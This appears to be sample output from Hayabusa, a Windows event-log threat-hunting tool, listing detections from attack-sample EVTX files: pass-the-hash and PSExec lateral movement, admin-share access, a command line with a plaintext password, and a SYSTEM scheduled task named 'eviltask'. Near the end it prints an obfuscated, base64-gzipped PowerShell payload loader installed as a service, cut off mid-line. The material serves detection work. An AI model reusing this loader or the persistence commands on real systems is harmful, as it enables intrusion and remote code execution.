Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4912 | PGUID: 747F3D96-3A89-607F-0000-001028587700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5280 | PGUID: 747F3D96-3A8A-607F-0000-0010E4717700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:14.860 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:14.861 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.17:137 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.15:137 (MSEDGEWIN10.home) | Dst: 10.0.3.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.255:137 () | Dst: 10.0.3.15:137 (MSEDGEWIN10.home) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 05:33:20.254 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49926 (MSEDGEWIN10) | Dst: 127.0.0.1:5357 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx 2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx 2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,high,,PSExec Lateral Movement,Service: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_LateralMovement-PSEXEC.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx 2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx 2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fd8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375ff5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376003,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376020,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.363 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1376020,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.364 +09:00,srvdefender01.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: PSEXESVC | User: admmig | LID: 0x1376020 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:40:32.531 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""cmd.exe"" -u demo\admmig -p Admin1235 -accepteula | Path: C:\Windows\cmd.exe | PID: 0x15d4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:41:03.008 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x590 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:42:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1050 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 18:43:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf90 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" 2021-04-21 22:30:00.569 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\schtasks.exe"" /create /sc minute /mo 1 /tn eviltask /tr C:\tools\shell.cmd /ru SYSTEM | Path: C:\Windows\System32\schtasks.exe | PID: 0x15b4 | User: admmig | LID: 0x6fc89e",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx 2021-04-21 22:30:00.589 +09:00,srvdefender01.offsec.lan,4698,info,,Task Created,"Name: \eviltask | Content: 2021-04-21T13:30:00 OFFSEC\admmig \eviltask PT1M false 2021-04-21T13:30:00 true IgnoreNew true true true false false PT10M PT1H true false true true false false false PT72H 7 C:\tools\shell.cmd S-1-5-18 LeastPrivilege | User: admmig | LID: 0x6fc89e",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx 2021-04-21 22:30:03.012 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x2ac | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx 2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx 2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx 2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 